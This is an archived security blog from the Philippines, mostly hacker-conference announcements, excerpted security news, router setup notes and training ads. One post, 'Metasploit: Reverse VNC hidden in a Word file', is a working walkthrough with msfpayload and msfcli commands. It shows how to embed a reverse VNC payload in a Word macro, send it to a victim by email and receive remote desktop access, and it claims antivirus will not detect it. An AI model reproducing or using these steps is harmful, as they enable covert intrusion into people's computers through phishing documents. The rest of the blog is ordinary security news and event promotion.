Internet Security

Register now for Rootcon 5!

2011-06-23T03:08:00.000-07:00

[*] Early Registration Rates

Will be open from May 01, 2011 to June 30, 2011

Professional = Php2800.00 (inclusive of 12% VAT)

Student = Php2240.00 (inclusive of 12% VAT)

Professional Group of 5 = Php2576.00 per head - (inclusive of 12% VAT)

Students Group of 5 = Php2016.00 per head - (inclusive of 12% VAT)

[*] Regular Registration Rates

Will be open from July 01, 2011 to August 01, 2011

Professional = Php3920.00 - (inclusive of 12% VAT)

Student = Php3360.00 - (inclusive of 12% VAT)

Professional Group of 5 = Php3696.00 per head - (inclusive of 12% VAT)

Students Group of 5 = Php3136.00 per head - (inclusive of 12% VAT)

Inclusions

ROOTCON is the cheapest and yet the most quality hacker conference in the country. Check out our inclusion and do the math.

Food: AM, PM Snacks and eat all you can lunch buffet

Badge: Cool human badge (no this isnt just a laminated badge)

T-Shirt: Official ROOTCON 5 tShirt

Games Participation

And many other surprises that you need to check out during the CON.

Access to a two day conference with cutting edge talks, games, exhibits, toolbox, JobFair hosted by Ditona.com and many cool and awesome stuffs. This is another unique opportunity for Professional and Social Networking.

Still I'm paranoid

2011-06-22T17:50:00.000-07:00

Leak testing Outpost Pro Firewall 7.5

Downloaded the Comodo Leaktests from here. And then running it and blocking everything that pops up. The result is satisfying but still I'm paranoid. Perfect security is unplugging from internet and locking my electronic devices in the closet. :)

Note: There is no patch for human stupidity.

ROOTCON 5

2011-03-25T00:22:00.000-07:00

Gear up everyone.

ROOTCON 5 will be hot, ROOTCON 5 will be happening on September 9-10 at Cebu Parklane International Hotel, Cebu City, the event will run 2 days with wide variety of tracks, there will be vendor showroom, job fair, hacking contest and many more.

Who and Why You Should Attend, because its the real and coolest hacker conference in the country, get to meet ninjas at their bests. You may check out our Top 10 lists of Who and Why You Should Attend.

Sponsorship - In our aim to maintain a good venue quality and perks, ROOTCON opened its doors to our friends from the Enterprise arena. We made sponsorships possible to ROOTCON by designing a specially crafted sponsorship environment, through this environment ROOTCON maintain its "vendor neutrality" advocacy, thus not jeopardizing the very essence of the CON and at the same time giving way to our friends from the Enterprise arena.

Our Sponsorship package is now ready, you may check out details at the Sponsorship Page.

Read more here.

rootCON 1

2010-10-13T18:16:00.000-07:00

Be guided with the full track listing for rootCON 1. Talk tracks is subject to change without prior notice depending on the availability of our speakers, but booze will always stay on schedule.

TRACK	EVENT	TIME
1	Registration / Badge Distribution	17:00 - 17:30
2	Opening with devnull	17:30 - 17:45
3	rootCON 101 Speaker: semprix and encrypted	17:45 - 18:15
4	Øwn1ng your InfoSec Career Speaker: Tikbalang	18:15 - 19:15
5	Your Tweet is my command Speaker: Bandit	19:15 - 20:15
6	Hacker Jeopardy - Light Metal Round	20:15 - 21:00
7	Hack Free or Die to Hack @ BackTrack 4 Speaker: Chris Chavez	21:00 - 22:00
8	Hacker Jeopardy - Heavy Metal Round	22:00 - 22:30
9	PGP Key Signing Party Introduction by: r4kista	22:30 - 22:45
10	Closing Remarks, Recognition and Awarding by: semprix	22:45 - 23:00
MORE BEER	MORE BEER - DRINK N' HACK	MORE BEER

tep Registration
Our Doorstep registration will be flat Php1000.00 inclusive of booze, food and hopefully youll have the badge.

rootCON 1 venue will be at Congo Grill, Ortigas Avenue branch, see map below. For coordinates on your GPS Lat 14.58508 Long 121.06045.

Mobile://09174390039 » HOT LINE
Email://info[you-know-what]rootcon dot org

Map

PinoyGreyHat Gathering 2009

2009-12-05T01:08:00.000-08:00

Registration now open. See details

Pay less register with the Early Registration promo. Registration for 100 slots is now open.

Early Registration = Php1500.00 (Note:Open until November 13, 2009)

Late Registration = Php2000.00 (Note:November 13 until December 05 2009 will be considered late registration)

At the DoorStep = Php2500.00 (Note:We will only be accepting 20 slots for DoorStep registration)

Student Registration = Php1000.00 (Note:Only 10 slots of students are available)

Registration Inclusion:

Food (PM snack and dinner)
Of Course: The Booze

To Register

We depreciated the use of web forms on the registration. We will only be accepting direct deposit. This will let the crew manually monitor the registration.
Steps on Direct Deposit
- We will be accepting direct deposit only.

Step 1. Deposit the payment through any ChinaBank branches on account number 2030397914 account name Louella Labrador.
Step 2. After confirming the payment, get the transaction number and send an email to registration[at]pinoygreyhat dot org, with the following format.
Subject: PinoyGreyHat Gathering 2009: Payment
Body:
Name or Handle:
Email Address:
Mobile Phone Number:
Payment Transaction Number:
Step 3. Wait for the email from the mailman to get the booze coupon

After sending an email to the registration mailman, the PinoyGreyHat crew will be verifying your payment, after verification you will be receiving a payment code with the instruction how to get your booze coupon. Anyone who wish to get their badge on the date of the CON, please remember to bring your payment code.

Frequently Ask Questions

Why is the payment being increased?

The place holder of BeerTalk 2(Grilla) is a bit small and literally hot, so we decided to get a more bigger, cooler place. Bayview Hotel is a 3 star hotel which is a bit expensive.

Are we going to receive certificates?

No! This is a greyhat gathering not a training class.

Are you going to give an official receipt?

PinoyGreyHat will only be giving a statement of account, signed by the officer.

The rest of the FAQ are posted on the FAQ page.

Submissions are closed! (milw0rm.com)

2009-07-07T19:56:00.000-07:00

Well, this is my goodbye header for milw0rm. I wish I had the time I did in the past to post exploits, I just don't :(. For the past 3 months I have actually done a pretty crappy job of getting peoples work out fast enough to be proud of, 0 to 72 hours (taking off weekends) isn't fair to the authors on this site. I appreciate and thank everyone for their support in the past.

Be safe, /str0ke

Goodbye milw0rm!

Police say hacker stole phone time from AT&T, others

2009-06-15T03:19:00.000-07:00

IDG News Service - An Italian magistrate has issued an international arrest warrant for a Filipino hacker suspected of causing millions of dollars of losses to telecommunications multinationals, and Italian police have arrested five Pakistani nationals accused of exploiting the hacker's work to defraud the telecom companies, officials in the northern city of Brescia said Friday.

The Filipino hacker allegedly penetrated the IT systems belonging to customers of major telephone companies, including AT&T, to steal access codes for international phone calls that he then sold to the group of Italy-based Pakistanis who ran a network of public phone centers. Police declined to identify the hacker by name, saying only that he was a 27-year-old male living in the Philippines.

Read more here.

Metasploit: Reverse VNC hidden in a Word file

2009-05-22T18:28:00.000-07:00

Credits goes to Punter of forum.darkc0de.com

Today i will show u how to use Metasploit payload feature for Reverse VNC connection which can be hidden in a Word file and get VNC desktop of the remote user

Metasploit will create a macro for Word, which once implemented when a user opens the word file we get a reverse VNC of the target system ,where the Word file contains the macro, even antvirus cant detect it,

there is no required of VNC installed in the Victim PC
u can also do this in WAN also only thing is u should port forward ur 4444 port in ur modem or router

Lets begin

1) Create a Macro to Intergate with word

./msfpayload windows/vncinject/reverse_tcp LHOST=192.168.147.128 V > /tmp/punter.bas

2) copy that punter.bas file in windows now go to windows
and open ur office 2003 –>tools–>macro–>visualbasic editor
then go to File–>import file–> and choose the punter.bas and save it with a name ex: macrogame.doc
now send this file to victim via mail or some other technique for this demo i will open in my system

3)now in Backtrack type this command

./msfcli multi/handler PAYLOAD=windows/vncinject/reverse_tcp LHOST=192.168.147.128 DisableCourtesyShell=True E

When the target on the windows open the file, it will be asked if he/she wished to accept or not run the macro, if it accepts, the connection will be initiated, and the VNC client will open on the post BackTrack.
not run the macro, if it accepts, the connection will be initiated, and the VNC client will open on the post BackTrack.

Video link for the above guide

http://blip.tv/file/1847504

http://wirelesspunter.blip.tv

Nice work Punter!

Viral web infection siphons ad dollars from Google

2009-05-21T18:14:00.000-07:00

A compromise that is moving virally across websites is making unwitting people who surf to them part of a botnet that redirects Google search results, a security researcher has warned.

During the past week, the number of websites identified as infected have almost tripled, according to researcher Mary Landesman with real-time malware scanning specialist ScanSafe tracking the attacks since March. Normally, web compromises die out after a few weeks, as search engines and anti-virus programs grow wise to them. But that's not happening this time.

Read more.

How To Choose And Remember Secure Passwords

2009-05-08T21:38:00.000-07:00

From email to online banking, passwords are an essential element of your online life. How can you make sure that they’re secure and memorable?

Australians are gradually becoming more aware that ‘password’ and ‘0000′ don’t really cut it when it comes to setting passwords (or pin numbers). According to the recently released 2009 Salmat VeCommerce Identity Verification Study, 51% of Australians think their passwords are at risk because they’re too easy to guess.

Read more here.

Microsoft to patch 'critical' PowerPoint hole

2009-05-07T18:39:00.000-07:00

By Dan Goodin in San Francisco • Get more from this author

Posted in Security, 7th May 2009 23:18 GMT

Free whitepaper – Choosing the best CRM for your organization

Microsoft plans to patch a hole in its PowerPoint presentation program, the company said in an advanced bulletin that was notable because it contained only a single update.

As is almost always the case with advanced notification bulletins issued the first Thursday of the month, Microsoft didn't provide many details about the following Tuesday's release, except to say it carried a severity rating of "critical," the company's highest level. That makes it impossible to know for sure what vulnerabilities will be fixed, but it's not hard to guess.

Read more here.

DEFCON Philippines BeerTalk II(Manila) Full Track

2009-03-13T23:00:00.000-07:00

Unconventional Privilege Escalation

Speaker: Tikbalang

Synopsis: Conventional privilege escalation deals with vulnerabilities and acquiring root level in the system. Is there a way of escalating privilege (unconventionally) without having the root level? Up to what extent can the escalations go? Is it really a threat to consider? Are people affected by this?

Penetration Testing, A Structured Approach: Conducting Penetration Tests in a business environment

Speaker: theStare

Synopsis: Recent developments concerning regulatory requirements, the current financial turmoil and rising security threats to organizations have opened the doors of business for various security service providers. Organizations are looking for service providers who understand their business and its associated risks, capable of assessing their current security posture, identify any gaps, and provide cost-effective recommendations that can reasonably address these gaps. They are searching for professionals who can perform these services in an organized manner, using a sound approach and a proven methodology. This talk deals with the details of managing penetration testing engagements, right from proposal preparation up to report delivery.

The Waledac Botnet

Speaker: Bullsh!t

Synopsis: Botnet technology and techniques are continuously evolving, and currently, the Waledac botnet is probably the most advanced botnet out there.

In this presentation, we will give a brief overview on botnet evolution, the technical aspects of Waledac, the botnet, what it does, and how the bot masters are raking in cash out of this.

Hackista 2009 (Øpen Hack Challenge)

Mechanics: The goal of this challenge is to obtain administrative level privileges on a windows 2000 server with no security patches by exploiting vulnerabilities in the RPC/LSASS Services on the target machine. The target machine IP address will be announced prior to the start of the challenge. Upon successful compromise, create a text file with your name on the target machine's desktop and notify any of the the goons for verification. The first one to compromise the machine after verification will be considered the winner and gets a change to do a demo on the methods he used. The first one to create their HANDLE.txt on the desktop of the compromised machine wins the game.

Tools: Any hacking tools are allowed, Metasploit, Nessus, Nmap etc..

Rules: No direct DoS on the server, anyone caught DoSing the server will automatically disqualify you from the game.

Price: The first one to create handle.txt will be getting black badge, black badge entitles you for lifetime access to the DEFCON Philippines event.

Who can join?: Anyone on the BeerTalk with valid booze tag will be able to join the Hackista Challenge, no goons will be joining the game.

Register now.

Next-gen botnet armies fill spam void

2009-01-19T21:20:00.000-08:00

Out with the old, in with the new

By Dan Goodin in San Francisco • Get more from this author

Posted in Spam, 14th January 2009 22:55 GMT

The demise late last year of four of the world's biggest spam botnets was good news for anyone with an email inbox, as spam levels were cut in half - almost overnight. But the vacuum has created opportunities for a new breed of bots, some of which could be much tougher to bring down, several security experts are warning.

New botnets with names like Waledac and Xarvester are filling the void left by the dismantling of Storm and the impairment of Bobax, Rustock, and Srizbi, these researchers say. The new breed of botnets - massive networks of infected Windows machines that spammers use to blast out billions of junk messages - sport some new designs that may make them more immune to current take-down tactics.

Read more here.

iPhone 3G finally unlocked

2008-12-18T00:08:00.000-08:00

By James Sherwood [More by this author]

17th December 2008 11:14 GMT

If an O2 contract’s all that’s standing in-between you and an iPhone 3G, then hardware hackers the iPhone Dev Team have a treat for you: an upcoming unlocking tool.

According to the team’s blog, it has successfully cracked the iPhone 3G for use on any network with an unlock codenamed 'yellowsn0w'.

Unfortunately, the unlock won’t be available until New Year’s Eve, but the team’s promised that it’ll have a simple GUI interface style akin to the existing QuickPwn jalbreaking application.

Read more here.

Researchers Crack WPA, No Brute Force Needed

2008-11-16T21:10:00.000-08:00

Bring your laptop, leave your dictionary

A pair of security researchers claim to have partially cracked WPA encryption, with an attack that takes around 15 minutes.

The technique relies on an undisclosed “mathematical breakthrough,” say researchers Erik Tews and Martin Beck, and breaks the Temporal Key Integrity Protocol (TKIP) key used to encrypt data between a wireless router and its clients. Currently, the attack works only one way: data traveling from the access point to its clients is vulnerable, while data traveling in the opposite direction is not.

Read more here.

DefconPH.org

2008-10-19T19:05:00.000-07:00

is a registered Defcon Groups International as DC6332. Defcon is the worlds largest hacking convention in the world. Same as Defcon, DefconPH.org is aiming to come up with the same convention here in the Philippines, since we are a registered international group of Defcon we will be having the same pattern as Defcon. During the CON we will be having the events as well like TCP/IP Drinking, Lock Picking, Spot The Feds etc.

The group is pretty much very new it all started February 2008. The main site of the group went down for a couple of months due to some Hosting issue, we plan to postponed the CON this December and move them to a more convenient time hopefully next year. We are inviting all people who are in the IT industry to support the exposure of IT Security related topics in the Philippines. Lets continue to support the IT Security Arena

For the mean time lets all interact on the user FORUM, in this way we can share our knowledge, ideas as to how the CON you want it to be.

Blog

World's electrical grids open to attack

2008-09-29T20:24:00.000-07:00

By Dan Goodin in San Francisco • Get more from this author

Posted in Security, 25th September 2008 18:03 GMT

A serious vulnerability has been found in yet another computerized control system that runs some of the world's most critical infrastructure, this time in a product sold by a vendor known as the ABB Group.

According to researchers from C4 - a firm specializing in the security of so-called SCADA, or Supervisory Control And Data Acquisition, systems - ABB's Process Communication Unit (PCU) 400 suffers from a critical buffer overflow bug.

"The vulnerability was exploited by C4 to verify it can be used for arbitrary code execution by an unauthorized attacker," researcher Idan Ofrat wrote in this advisory published on Thursday. "In addition, an attacker can use his control over the FEP server to insert a generic electric grid malware...in order to cause harm to the grid."

Popular Web Attacks Go Stealth

2008-08-29T00:22:00.000-07:00

Attackers are increasingly using encoding to sneak their SQL injection, cross-site scripting attacks past Web security

By Kelly Jackson Higgins

Senior Editor, Dark Reading

A sneaky form of Web attack is emerging that masks the more popular methods used by attackers today.

Encoded SQL injection and cross-site scripting (XSS) attacks are becoming all the rage as Web defenses are getting better at catching these popular scripting attacks, according to WhiteHat Security’s Website security statistics report released today. “Your garden variety SQL and XSS is being replaced by encoded versions” of them, says Jeremiah Grossman, CTO of WhiteHat Security. “Any injection-style attack can be encoded using 100 different techniques and variations.”

Attackers have begun hiding the malicious code by encoding so they can keep using these old-school attacks, which organizations are getting better at detecting in the clear, says Grossman.

Read more here.

Happy SysAdmin Day!

2008-07-25T21:19:00.000-07:00

A sysadmin unpacked the server for this website from its box, installed an operating system, patched it for security, made sure the power and air conditioning was working in the server room, monitored it for stability, set up the software, and kept backups in case anything went wrong. All to serve this webpage.

A sysadmin installed the routers, laid the cables, configured the networks, set up the firewalls, and watched and guided the traffic for each hop of the network that runs over copper, fiber optic glass, and even the air itself to bring the Internet to your computer. All to make sure the webpage found its way from the server to your computer.

Read more here.

Back to back setup of Xpeed 320R

2008-07-08T23:06:00.000-07:00

Telnet 192.168.1.1

Username: system

Password: system

Step 1:

>modify

COMMUNITY

CONSOLE

DEVICE

DSCONFIG

FRCONFIG

INTERFACE

TRAPIPADOR

CHOICE: 4

Port: w0.0

Link Speed [l11 – 2320 and multiple of 8, AUTOHUNT, or AUTOSENSED] [2320 kbps] : 2320

Serial Swapped [N] : N

Stream Inverted [Y] : Y

** Please save and reboot for changes to take effect. **

>save

>reboot

Step 2:

>modify

COMMUNITY

CONSOLE

DEVICE

DSCONFIG

FRCONFIG

INTERFACE

TRAPIPADOR

1^st XPEED

CHOICE : 5

Port : w0.0

LMI [OFF] : ON

SwitchType [ANSI] : ANSI

Termination [NT] : LT

2^nd XPEED

CHOICE : 5

Port : w0.0

LMI [OFF] : ON

SwitchType [ANSI] : ANSI

Termination [NT] : NT

** Please save and reboot for changes to take effect. **

>save

>reboot

Step 3:

>modify

COMMUNITY
CONSOLE
DEVICE
DSCONFIG
FRCONFIG
INTERFACE
TRAPIPADOR

CHOICE : 6

Interface: w0.0

Dhcp Client (ON | OFF) [OFF] : OFF

Enable (Y | N) [Y] : Y

FramingType (IPRouting | BridgedEthernet | RFC1490MAC | RFC1483MAC) [BridgedEthernet]

: BridgedEthernet

1^st XPEED

Gateway [172.16.0.1] : 192.168.1.1

IPaddress [172.16.11.129] : 192.168.1.161

Netmask [255.255.0.0] : 255.255.255.0

2^nd Xpeed

Gateway [172.16.0.1] : 192.168.1.1

IPaddress [172.16.11.130] : 192.168.1.151

Netmask [255.255.0.0] : 255.255.255.0

** Please save and reboot for changes to take effect. **

>save

>reboot

Note:

“?” or “help” shows you the available commands.

Step 4: (Apply this to xpeed1 and xpeed2)

Just type the word “modify”

COMMUNITY
CONSOLE
DEVICE
DSCONFIG
FRCONFIG
INTERFACE
TRAPIPADOR

CHOICE: 3

Device (BRIDGE | ROUTER) [BRIDGE] : BRIDGE

** Please save and reboot for changes to take effect. **

>save

>reboot

(After a minute press ENTER key then login to telnet 192.168.1.1)

PHYSICAL SETUP:

Step:

Need 2 xpeed320R Bridges
Plug Power supply into an AC power source and other end into 9vdc Connector on the rear
Connect RJ-45 Ethernet Cable (8 pins on each connector) to the LAN PORT on rear of the modem and other end connects to the NIC card on PC or you can also connect your laptop in place of the PC.
Connect a PC or LAPTOP to each bridge
Connect one end of the DSL CABLE into the SDSL port on rear of the modem and the other end into the DSL
If you want to get INTERNET ACCESS through this SETUP….

Connect one of the modem with Ethernet cable, make sure you have CROSS-OVER CABLE for connecting the x320R bridge with either a ROUTER or a HUB or a NETWORK SWITCH.

CONFIGURATION SETUP:

Give IP Address on both PC’s connected to the modem , make sure they are under the same subnetwork with same subnet mask and same default gateway

Example

Xpeed320R Xpeed320R

A (PC or Laptop) ------------ B (PC or Laptop)

INTERNET ----ROUTER ---HUB -----XPEED320R A (PC or Laptop)-----XPEED320R B (PC or Laptop)

Linux Expert+ Security Program

2008-06-30T22:50:00.000-07:00

on August 11-15, 2008

Course Fee: 22,500+12%VAT

Duration: 5days; 9am-5pm; M-F

Objective

This course looks at the network security in defensive view. The Linux Security program is designed to provide Expert skills needed to analyze the internal and external security threats against a network, and to develop / design / configure, security systems / appliances / applications that will protect an organization's information.

Students will learn how to evaluate network and Internet security issues and design. In addition, they will learn how to build a security appliance using the Linux OS and GPL Application.

This Course covers following courses:

· EC-Council Linux Security

· Novell SuSE Linux Administration

Course Outline/Agenda

Module1: General Considerations & Definition of Terms

Creating a security concept

Understanding the basics of a security concept

Performing a communication analysis

Analyzing protection requirements

Analyzing the current security situation and necessary enhancements

Module2: Designing Linux box for UTM Appliance

Installation & Configuration of Linux OS for Security Device

Hardening OS & Kernel

Installation for required services

Module3: Linux Networking Fundamentals

Explain the purposes and development of computer networking

Identify common types of networking hardware

Describe how networking software operates

Understand when popular networking protocols are used

Define network routing and describe the purpose of popular routing protocols

Module4: Configuring Basic Linux Networking

Describe how networking devices differ from other Linux devices

Configure Linux networking using scripts and text-mode utilities

Configure Linux networking using popular graphical utilities

Effectively use networking utilities to test a network and troubleshoot networking problems

Module5: Designing Firewalls over Linux

General Firewall Design

Understanding Firewall Concepts and Purpose

Describing firewall components

Packet Filters

Application-Level Gateways

Demilitarized Zone

Understanding Advantages and Disadvantages of firewall configurations

Packet Filters

Application-Level Gateways

Packet Filters

Understanding Packet Filters

Routing

Stateful Packet Filters

Understanding Advanced Firewall Features & Server

Design Firewall Appliance

Design / Configure smart GUI for Firewall Appliance

Understanding Network Address Translation (NAT)

Masquerading

NAT

PAT (Port Address Translation)

Module6: Designing VPN Appliances

Site to Site VPN Appliance

Client to Site VPN Appliance

Discussing

Module7: Setting up Secure Device Administration

Module8: Designing Internet Content Filter

Module9: Configuring Secure DNS Server

Module10: Designing IDS / IPS Appliance

Host Based Intrusion Detection System

Network Based Intrusion Detection System

Placing IDS / IPS to the Network

Module11: Configuring Secure DHCP Server

Module12: Design Vulnerability Scanning Appliance

Module13: Design Secure Email Server

Module14: Setting up secure sFTP Server

Module15: Design Security Audit Appliance

Module16: Security, Ethics and Privacy

List security risks typical in modern networked computer systems

Understand how to assess risk and create a security policy

Describe the function of top security-awareness organizations

Outline the role of the government in security and privacy

Module17: Making Data Secure

Explain commonly used cryptographic systems

Understand digital certificates and certificate authorities

Use the PGP and CPG data-encryption utilities

Describe different ways in which cryptography is applied to make computer systems more secure.

Module18: User Security

Follow good password security practices

Use Common utilities to promote user security

Module19: File Security

Correctly set up special Linux file permissions

Monitor log files to check for suspicious system activity

Automate checks for file integrity and unauthorized modifications

Module20: UTM Appliance deployment in real life scenarios

Positioning UTM Appliances

Deployment of appliance in production network

About the Speaker:

Mr. Islam is something of an expert when it comes to evaluating security products"

said Juniper Networks (2006)

Professional Profile

Almost 10 years of experience in designing networks and IT Security Infrastructure. Extensive knowledge and hands-on experience on Information Security for mission critical environments, Implemented high-end Security Products & Policies based on ISO 17799 & BS 7799 standards for more than 25 enterprises & various Mid-level enterprises all around the world. Awarded as Master of IT by Juniper http://www.masterofit.net in 2006, CEH (Certified Ethical Hacker), ECSA (EC-Certified Security Analyst).

Currently Mr. Islam is serving one of the largest Govt. Ministry of Kuwait as Network Security Consultant / Architect

Mr. Islam did consulting for various products like: Cisco Security Appliances, UTM Appliances (Firewall, IDS, AntiSPAM, Antivirus), Astaro Security Linux Appliances etc., Juniper, Snort / SAM / ACID names of few

ENROLL NOW!

GLOBAL KNOWLEDGE ASSOCIATES INC.

25th flr. Unit no. 2502b West Tower Philippine Stock Exchange, Ortigas Center Pasig City, 1605 Philippines

Tel. No. (632) 683-0969 / 637-3657 Mobile: +63 920-709-8298

Email: sandra@globalknowledgeph.com Email2: sandramedalla@gmail.com

URL: www.gkphilippines.com

--
Network Security Consultant
CEH (Certified Ethical Hacker), ECSA (EC-Security Analyst) , Juniper Networks Master of IT
http://www.masterofit.net/index.php?filter=deck&cid=1

EC-Council ECSA/LPT Certification Bootcamp

2008-06-14T02:56:00.000-07:00

Schedule

June 23-27, 2008

Duration / Course fee
5 days (9:00 – 5:00) php65,000.00+VAT/person, inclusive of ECSA Exam, Kit and Meal.

Exam
The ECSA certification exam will be conducted on the last day of training. Students need to pass the online Prometric exam 412-79 to receive the ECSA certification. The Student also will be prepared for the LPT certification.

Discount:

Please call 683-0969 / 637-3657 / 0920-709-8298 and look for Sandra.

Course Description

ECSA/LPT is a security class like no other! Providing real world hands on experience, it is the only in-depth Advanced Hacking and Penetration Testing class available that covers testing in all modern infrastructures, operating systems and application environments.

EC-Council’s Certified Security Analyst/LPT program is a highly interactive 5-day security class designed to teach Security Professionals the advanced uses of the LPT methodologies, tools and techniques required to perform comprehensive information security tests. Students will learn how to design, secure and test networks to protect your organization from the threats hackers and crackers pose. By teaching the tools and ground breaking techniques for security and penetration testing, this class will help you perform the intensive assessments required to effectively identify and mitigate risks to the security of your infrastructure. As students learn to identify security problems, they also learn how to avoid and eliminate them, with the class providing complete coverage of analysis and network security-testing topics.

Who Should Attend
Network server administrators, Firewall Administrators, Security Testers, System Administrators and Risk Assessment professionals.

Course Outline v3

Module 1: The Need for Security Analysis

Module 2: Advanced Googling

Module 3: TCP/IP Packet Analysis

Module 4: Advanced Sniffing Techniques

Module 5: Vulnerability Analysis with Nessus

Module 6: Advanced Wireless Testing

Module 7: Designing a DMZ

Module 8: Snort Analysis

Module 9: Log Analysis

Module 10: Advanced Exploits and Tools

Module 11: Penetration Testing Methodologies

Module 12: Customers and Legal Agreements

Module 13: Penetration Testing Planning and Scheduling

Module 14: Pre Penetration Testing Checklist

Module 15: Information Gathering

Module 16: Vulnerability Analysis

Module 17: External Penetration Testing

Module 18: Internal Network Penetration Testing

Module 19: Router Penetration Testing

Module 20: Firewall Penetration Testing

Module 21: IDS Penetration Testing

Module 22: Wireless Network Penetration Testing

Module 23: Denial of Service Penetration Testing

Module 24: Password Cracking Penetration Testing

Module 25: Social Engineering Penetration Testing

Module 26: Stolen Laptop Penetration Testing

Module 27: Application Penetration Testing

Module 28: Physical Security Penetration Testing

Module 29: Database Penetration testing

Module 30: VoIP Penetration Testing

Module 31: VPN Penetration Testing

Module 32: Penetration Testing Report Analysis

Module 33: Penetration Testing Report and Documentation Writing

Module 34: Penetration Testing Deliverables and Conclusion

Module 35: Ethics of a Licensed Penetration Tester

To Register

Please call 683-0969 / 637-3657 and look for Sandra.

GLOBAL KNOWLEDGE ASSOCIATES INC
25th flr. Unit no. 2502b West Tower Philippine Stock Exchange, Ortigas Center Pasig City , 1605 Philippines
Tel. No. (632) 683-0969 / 637-3657 Mobile No.: (+63) 920-709-8298
Email: sandra@globalknowledgeph.com YM: sandra_medalla@yahoo.com
URL: www.gkphilippines.com

New blackmailing Trojan encrypts files using high-grade 1024-bit RSA key

2008-06-09T17:49:00.000-07:00

By Gregg Keizer

June 8, 2008 (Computerworld) A security company on Friday asked for help cracking an encryption key central to an extortion scheme that demands money from users whose PCs have been infected by malware.

Kaspersky Lab, a Moscow-based antivirus firm, put out the call for assistance after it discovered a new variant of Gpcode, a Trojan horse that has been used in isolated "ransomware" attacks for the past two years.

In ransomware attacks, hackers plant malware that encrypts files and then displays a message demanding money to unlock the data. In the case of the newest Gpcode, 143 different file types are encrypted, including .bak, .doc, .jpg and .pdf.

Read more here.

DNS attack left service provider down for five hours

2008-06-02T01:22:00.000-07:00

The hackers responsible for Wednesday's attack on Comcast say they were angry with the company, and "wanted to take them out," according to a news report.

Comcast, one of the largest Internet service providers in the U.S., found that its primary Website, Comcast.net, had been defaced at around 11 p.m. on Wednesday. The hackers had redirected the traffic to another Web server, replacing some of the site's content with their own greeting.

Read more here.

Rootkits on routers threat to be demoed

2008-05-15T18:39:00.000-07:00

By John Leyden → More by this author

Security researchers have devised a rootkit capable of covertly monitoring and controlling Cisco routers.

Sebastian Muniz, of Core Security, plans to demo Cisco IOS rootkit software he developed during a presentation at the EuSecWest conference in London on 22 May.

Rootkits are malicious packages used to hide the presence of malware on compromised systems. Generally such packages are designed to allow Trojan backdoors on desktop computer or servers to escape detection by anti-virus scanners. The technology started off in the toolboxes of Unix hackers, but over the last three or four years, it has become more commonly associated with compromised Windows systems. The issue of Windows rootkits rose to public prominence after Sony BMG Music (rather inadvisedly) used rootkit-like technology in a bid to prevent unauthorised CD copying.

Muniz's is reckoned to be the first researcher to apply rootkits to systems running Cisco IOS software. His work builds on the pioneering work of security researcher Michael Lynn, who controversially demonstrated interactive shell code for Cisco’s proprietary Internetworking Operating System (IOS) during Blackhat 2005.

Read more here.

Internet Security

Register now for Rootcon 5!

Still I'm paranoid

ROOTCON 5

Gear up everyone.

rootCON 1

TRACK

EVENT

TIME

rootCON 1 venue will be at Congo Grill, Ortigas Avenue branch, see map below. For coordinates on your GPS Lat 14.58508 Long 121.06045.

PinoyGreyHat Gathering 2009

Registration now open. See details

To Register

Steps on Direct Deposit

Frequently Ask Questions

Why is the payment being increased?

Are we going to receive certificates?

Are you going to give an official receipt?

Submissions are closed! (milw0rm.com)

Police say hacker stole phone time from AT&T, others

Metasploit: Reverse VNC hidden in a Word file

Viral web infection siphons ad dollars from Google

How To Choose And Remember Secure Passwords

Microsoft to patch 'critical' PowerPoint hole

DEFCON Philippines BeerTalk II(Manila) Full Track

Next-gen botnet armies fill spam void

iPhone 3G finally unlocked

Researchers Crack WPA, No Brute Force Needed

DefconPH.org

World's electrical grids open to attack

Popular Web Attacks Go Stealth

Happy SysAdmin Day!

Back to back setup of Xpeed 320R

Linux Expert+ Security Program

EC-Council ECSA/LPT Certification Bootcamp

New blackmailing Trojan encrypts files using high-grade 1024-bit RSA key

DNS attack left service provider down for five hours

Rootkits on routers threat to be demoed